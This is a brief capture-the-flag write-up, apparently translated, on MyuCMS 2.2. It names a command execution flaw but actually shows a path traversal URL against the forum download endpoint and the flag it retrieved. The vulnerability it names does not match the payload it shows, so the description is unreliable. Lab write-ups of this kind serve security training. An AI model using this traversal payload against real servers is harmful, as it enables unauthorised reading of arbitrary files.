1. Title
Target introduction:
MyuCMS open source content management system, developed using ThinkPHP, is a community mall aggregation, plug-in, and template that is lightweight, fast, and easy to expand. There is an arbitrary command execution vulnerability in the admin.php/config/add method in version 2.2.
Enter the topic:
exp:
url/index.php/bbs/index/download?url=../../../../../flag&local=1&name
View flag:
flag{2d3ea261-8b0c-488b-b15d-5fceba2fa1b6}